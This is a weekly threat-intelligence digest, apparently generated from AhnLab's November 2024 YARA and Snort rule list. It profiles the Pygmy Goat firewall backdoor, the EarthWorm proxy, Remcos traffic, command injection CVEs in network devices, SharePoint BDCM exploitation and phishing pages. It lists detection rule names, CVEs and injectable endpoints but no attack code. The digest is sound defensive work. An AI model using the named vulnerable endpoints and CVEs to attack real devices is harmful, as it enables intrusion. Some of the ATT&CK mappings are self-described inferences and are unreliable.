Full Report
The following is the information on Yara and Snort rules (week 2, November 2024) collected and shared by the AhnLab TIP service. 3 YARA Rules Detection name Description Source MAL_Sophos_XG_Pygmy_Goat_AES_Key Detects Pygmy Goat – a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This […] 게시물 Weekly Detection Rule (YARA and Snort) Information – Week 2, November 2024이 ASEC에 처음 등장했습니다.
Analysis Summary
# Tool/Technique: Pygmy Goat
## Overview
Pygmy Goat is a native x86-32 ELF shared object malware discovered on Sophos XG firewall devices. Its primary purpose is to provide backdoor access, likely for persistent control and command execution on the compromised system.
## Technical Details
- Type: Malware
- Platform: Linux (specifically targeting Sophos XG firewall devices running ELF binaries)
- Capabilities: Provides backdoor access; utilizes specific AES keys and magic byte sequences for C2 communications.
- First Seen: Information not explicitly provided, but detections were observed in November 2024.
## MITRE ATT&CK Mapping
As this is a backdoor providing remote access, the following mappings are inferred based on its function:
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- TA0003 - Persistence
- T1543 - Create or Modify System Process (Inferred, often used by persistent backdoors)
## Functionality
### Core Capabilities
- Establishing a persistent backdoor presence on Sophos XG firewalls.
- Utilizing specific static AES keys embedded in the binary for encryption/decryption.
### Advanced Features
- Employs unique magic byte sequences specific to its Command and Control (C2) communications, which are used for detection.
- Functions as an ELF shared object, suggesting integration or loading mechanism within the host system processes.
## Indicators of Compromise
- File Hashes: [Not provided in the context data]
- File Names: [Not provided in the context data, but is an ELF shared object]
- Registry Keys: [Not applicable/Not provided for this Linux-based malware]
- Network Indicators: Communication relies on specific magic byte sequences. [No specific C2 addresses provided]
- Behavioral Indicators: Anomalous SSH banner activity may be present (ET TROJAN \[NCSC\] Pygmy Goat SSH Banner). Use of specific embedded keys during communication.
## Associated Threat Actors
- The threat group that deployed Pygmy Goat malware specifically targeted Sophos XG firewall devices.
## Detection Methods
- Signature-based detection (YARA):
- `MAL_Sophos_XG_Pygmy_Goat_AES_Key`: Detection based on the Pygmy Goat AES key found on the stack or in data sections.
- `MAL_Sophos_XG_Pygmy_Goat_Magic_Strings`: Detection based on magic byte sequences used during C2 communications.
- Snort Rules:
- `ET TROJAN [NCSC] Pygmy Goat SSH Banner`
- `ET TROJAN [NCSC] Pygmy Goat SSH ed25519 Key`
## Mitigation Strategies
- Patching and securing Sophos XG firewall firmware against exploitation.
- Network segmentation to isolate firewalls.
- Monitoring SSH traffic for unusual banners or key exchanges associated with this malware.
## Related Tools/Techniques
- EarthWorm: A reverse SOCKS proxy used by the same threat group, suggesting coordination between the backdoors (EarthWorm) and initial access/persistence (Pygmy Goat).
***
# Tool/Technique: EarthWorm
## Overview
EarthWorm is identified as a reverse SOCKS proxy tool used by the same threat group that deployed Pygmy Goat malware on Sophos XG firewall devices. Its function is to establish tunneled network connections, likely facilitating C2 traffic or lateral movement.
## Technical Details
- Type: Tool / Proxy
- Platform: Used in conjunction with compromises on Sophos XG firewall devices (Likely Linux/ELF execution environment).
- Capabilities: Functions as a reverse SOCKS proxy, enabling remote connectivity through the compromised host. The detection method focuses on x86 assembly related to pool number generation.
- First Seen: Information not explicitly provided.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1090 - Proxy
## Functionality
### Core Capabilities
- Establishing a reverse SOCKS proxy connection from the compromised target back to the attacker.
### Advanced Features
- Detection relies on specific assembly code patterns related to how it generates its pool number.
## Indicators of Compromise
- File Hashes: [Not provided]
- File Names: [Not provided]
- Registry Keys: [Not applicable/Not provided]
- Network Indicators: Proxy traffic patterns. [No specific C2 addresses provided]
- Behavioral Indicators: Detection signature focusing on `MAL_EarthWorm_Socks_Proxy_ID_Generation`.
## Associated Threat Actors
- The threat group that deployed Pygmy Goat malware on Sophos XG firewall devices.
## Detection Methods
- Signature-based detection (YARA):
- `MAL_EarthWorm_Socks_Proxy_ID_Generation`: Detection based on the x86 assembly pattern used for pool num generation.
## Mitigation Strategies
- Network monitoring for unexpected outbound SOCKS proxy connections originating from network infrastructure devices.
- Hardening firewalls to prevent the initial method used to deploy EarthWorm and Pygmy Goat.
## Related Tools/Techniques
- Pygmy Goat: Malware often deployed by the same actor in conjunction with EarthWorm.
***
# Tool/Technique: Remcos Payload M2 Traffic
## Overview
This entry refers to network traffic indicative of communication with a known Command and Control (C2) infrastructure associated with the Remcos Remote Access Trojan (RAT).
## Technical Details
- Type: Malware/Network Pattern
- Platform: Unknown (Inferred to be Windows given Remcos' typical profile, but the detection is network-based)
- Capabilities: Indication of an active Remcos session or attempt to download the payload.
- First Seen: November 2024 observation window.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
## Functionality
### Core Capabilities
- Signatures detect HTTP requests specifically targeting a known C2 stage for the Remcos RAT payload.
## Indicators of Compromise
- Network Indicators: HTTP Requests matching known Remcos C2 patterns (`ET TROJAN HTTP Request to Remcos Payload M2`).
## Associated Threat Actors
- Actors utilizing the Remcos RAT.
## Detection Methods
- Snort Rules:
- `ET TROJAN HTTP Request to Remcos Payload M2`
## Mitigation Strategies
- Blocking access to known Remcos C2 domains/IPs (if listed in a complete IOC feed).
- Endpoint detection and response capable of identifying Remcos installation or execution.
## Related Tools/Techniques
- Remcos RAT.
***
# Technique: Command Injection (Various Vendor Devices)
## Overview
Several Snort rules indicate detection of command injection attempts targeting a variety of network hardware and vendor applications, signifying common exploitation techniques being actively monitored.
## Technical Details
- Type: Technique (Vulnerability Exploitation)
- Platform: Primarily network devices (D-Link, Tenda, APsystems) and Microsoft SharePoint.
- Capabilities: Successful injection allows for arbitrary command execution on the target device/application.
- First Seen: Rules cover multiple CVE dates ranging from 2019 to 2024.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1204 - User Execution (If exploiting a user-facing feature)
- T1190 - Exploit Public-Facing Application
## Functionality
### Core Capabilities
- Exploiting input fields (e.g., in web interfaces like `ping.ccp`, `cgi_user_add`) to force the execution of attacker-supplied shell commands.
## Indicators of Compromise
- Network Indicators: Specific command strings or payloads indicative of injection attempts targeting vulnerable services.
## Associated Threat Actors
- Generic activity, often associated with automated scanning or exploit campaigns targeting known CVEs.
## Detection Methods
- Snort Rules focusing on specific CVEs:
- **D-Link:** CVE-2024-10914 (NAS OS), CVE-2019-20499/20500/20501 (DWL-2600AP)
- **Tenda:** CVE-2023-27240 (AX3), CVE-2022-30023 (HG9 Router)
- **APsystems:** CVE-2022-45699 (ECU-R)
- **PTZOptics:** CVE-2024-8956 (Authentication Bypass, leading to potential injection/access)
## Mitigation Strategies
- Immediate patching of affected devices (D-Link, Tenda, APsystems, PTZOptics).
- Input validation on all device management interfaces.
## Related Tools/Techniques
- Other web application exploitation techniques.
***
# Technique: Microsoft SharePoint Vulnerability Exploitation (CVE-2023-24955, CVE-2024-38094)
## Overview
Detection rules specifically target exploitation attempts against Microsoft SharePoint related to two different high-profile vulnerabilities, focusing on the creation and execution of BDCM files.
## Technical Details
- Type: Technique (Vulnerability Exploitation)
- Platform: Microsoft SharePoint Server
- Capabilities: Successful exploitation allows an attacker to create and execute malicious BDCM (Business Data Connectivity Manager) files, leading to code execution.
## MITRE ATT&CK Mapping
- TA0002 - Execution
- T1190 - Exploit Public-Facing Application
## Functionality
### Core Capabilities
- Attempting to leverage flaws in how SharePoint processes BDCM files to execute arbitrary code.
## Indicators of Compromise
- Network Indicators: Traffic patterns associated with the upload/creation and subsequent execution trigger of malicious BDCM files.
## Associated Threat Actors
- Threat actors targeting vulnerable SharePoint instances.
## Detection Methods
- Snort Rules:
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM File Creation (CVE-2023-24955)`
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM Execution (CVE-2023-24955)`
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM File Creation (CVE-2024-38094)`
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM Execution (CVE-2024-38094)`
## Mitigation Strategies
- Applying relevant Microsoft security updates for CVE-2023-24955 and CVE-2024-38094.
## Related Tools/Techniques
- File Upload vulnerabilities.
***
# Technique: Credential Phishing Landing Pages
## Overview
Multiple rules track network traffic associated with credential harvesting pages, specifically mentioning campaigns tracked as "DadSec" and "MAMBA," and methods involving Cloudflare Turnstile rendering.
## Technical Details
- Type: Technique (Phishing/Credential Access)
- Platform: Web traffic
- Capabilities: Directing users to imitation login pages to harvest credentials. Specific activity noted related to Cloudflare's anti-bot/anti-scraping technology (Turnstile).
## MITRE ATT&CK Mapping
- TA0006 - Credential Access
- T1566 - Phishing
## Functionality
### Core Capabilities
- Hosting misleading websites designed to capture user credentials, often utilizing recent naming schemes (DadSec, MAMBA).
## Indicators of Compromise
- Network Indicators: Traffic flows matching redirects or access patterns to known phishing domains, especially those involving specific Cloudflare Turnstile rendering techniques observed on specific dates (e.g., 2024-11-05, 2024-11-07, 2024-11-08).
## Associated Threat Actors
- DadSec and MAMBA related campaigns (General phishing operations).
## Detection Methods
- Snort Rules:
- Rules tracking Google redirect behavior.
- Rules tracking DadSec and MAMBA-named landing pages.
- Rules differentiating between generic phishing pages and those using explicit/implicit Cloudflare Turnstile rendering.
## Mitigation Strategies
- User security awareness training regarding suspicious links and credential entry.
- Network filtering or DNS blacklisting for known phishing domains.